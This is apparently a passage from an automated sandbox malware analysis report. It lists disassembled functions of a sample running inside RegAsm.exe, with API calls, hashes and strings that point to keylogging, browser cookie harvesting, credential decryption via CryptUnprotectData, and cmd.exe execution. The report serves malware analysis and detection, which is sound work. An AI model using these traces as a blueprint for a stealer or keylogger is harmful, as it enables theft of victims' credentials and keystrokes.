                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$FileModuleName
                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        • API String ID: 2506810119-1068371695
                                                                        • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                        • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                        • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                        • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                        Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63A21986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                        • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                        • String ID: /sort "Visit Time" /stext "$0NG
                                                                        • API String ID: 368326130-3219657780
                                                                        • Opcode ID: c9918486698fa1facc7475353dff3b0eab899f83a18ffbf80fb8a8f949f99717
                                                                        • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                                        • Opcode Fuzzy Hash: c9918486698fa1facc7475353dff3b0eab899f83a18ffbf80fb8a8f949f99717
                                                                        • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                                        Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32 ref: 0041CAD7
                                                                          • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                          • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                                          • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                        • API String ID: 4127273184-3576401099
                                                                        • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                                        • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                                        • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                                        • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                                        Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 004162F5
                                                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                          • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                                          • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                                          • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _wcslen$CloseCreateValue
                                                                        • String ID: !D@$@5U$okmode
                                                                        • API String ID: 3411444782-2267304325
                                                                        • Opcode ID: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                                        • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                                        • Opcode Fuzzy Hash: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                                        • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                                        Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                                                                        Strings
                                                                        • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                        • API String ID: 1174141254-1980882731
                                                                        • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                                        • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                                        • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                                        • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                                        Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                                                                        Strings
                                                                        • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                        • API String ID: 1174141254-1980882731
                                                                        • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                                        • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                                        • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                                        • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                                        Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040A20E
                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
                                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread$LocalTimewsprintf
                                                                        • String ID: Offline Keylogger Started
                                                                        • API String ID: 465354869-4114347211
                                                                        • Opcode ID: 6722521d9a354589ddfd9572c5f22cfa7bfd03d06c3fb38996f6b2f9df3dd413
                                                                        • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                                        • Opcode Fuzzy Hash: 6722521d9a354589ddfd9572c5f22cfa7bfd03d06c3fb38996f6b2f9df3dd413
                                                                        • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                                        Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                                        • String ID: Online Keylogger Started
                                                                        • API String ID: 112202259-1258561607
                                                                        • Opcode ID: 9998e3ed5b0b0a24696408f27a990a726a89a8e91e885a70493f5dfbd0b772b3
                                                                        • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                                        • Opcode Fuzzy Hash: 9998e3ed5b0b0a24696408f27a990a726a89a8e91e885a70493f5dfbd0b772b3
                                                                        • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                                        Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: CryptUnprotectData$crypt32
                                                                        • API String ID: 2574300362-2380590389
                                                                        • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                        • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                                        • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                        • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                                        Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                        • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                        • SetEvent.KERNEL32(?), ref: 004051D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEventHandleObjectSingleWait
                                                                        • String ID: Connection Timeout
                                                                        • API String ID: 2055531096-499159329
                                                                        • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                                        • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                                        • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                                        • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                                        Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Exception@8Throw
                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                        • API String ID: 2005118841-1866435925
                                                                        • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                        • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                                        • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                        • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                                        Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041381F
                                                                        • RegSetValueExW.ADVAPI32 ref: 0041384D
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00413858
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 1818849710-4028850238
                                                                        • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                                        • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                                        • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                                        • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                                        Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                        • String ID: bad locale name
                                                                        • API String ID: 3628047217-1405518554
                                                                        • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                                        • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                                        • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                                        • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                                        Function 10004B39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHandleLibraryModule
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 662261464-1276376045
                                                                        • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                        • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                        • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                        • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                        Function 0041361B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32 ref: 0041363D
                                                                        • RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00413665
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: @5U
                                                                        • API String ID: 3677997916-921383711
                                                                        • Opcode ID: f8021bfd515d837cd78af2754fa90286b7de4a0a46112e11e0f2f857281b4111
                                                                        • Instruction ID: f34a781dc69553a1478c4d1e38e8143fd29b0d6f10a6f19acb5bd71dd86b2662
                                                                        • Opcode Fuzzy Hash: f8021bfd515d837cd78af2754fa90286b7de4a0a46112e11e0f2f857281b4111
                                                                        • Instruction Fuzzy Hash: 00F04F75600218FBDF209B90DC05FDD77BCEB04B11F1040A2BA45B5291DB749F849BA8
                                                                        Function 004437E5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: 0;U$2U
                                                                        • API String ID: 269201875-690850028
                                                                        • Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                                        • Instruction ID: d76a88c3c7e0b504eff74fb84b9f6db8507cba8af1ea4ea387731c34734dfbbf
                                                                        • Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                                        • Instruction Fuzzy Hash: AAE0E562A0182040F675BA3F2D05B9B49C5DB8173BF11433BF538861C1DFAC4A4251AE
                                                                        Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                                        • ShowWindow.USER32(00000009), ref: 00416C61
                                                                        • SetForegroundWindow.USER32 ref: 00416C6D
                                                                          • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                                                                          • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                          • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                          • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                        • String ID: !D@
                                                                        • API String ID: 186401046-604454484
                                                                        • Opcode ID: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                                        • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                                        • Opcode Fuzzy Hash: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                                        • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                                        Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExecuteShell
                                                                        • String ID: /C $cmd.exe$open
                                                                        • API String ID: 587946157-3896048727
                                                                        • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                                        • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                                        • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                                        • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                                        Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,`2U,004752F0,?,pth_unenc), ref: 0040B8BB
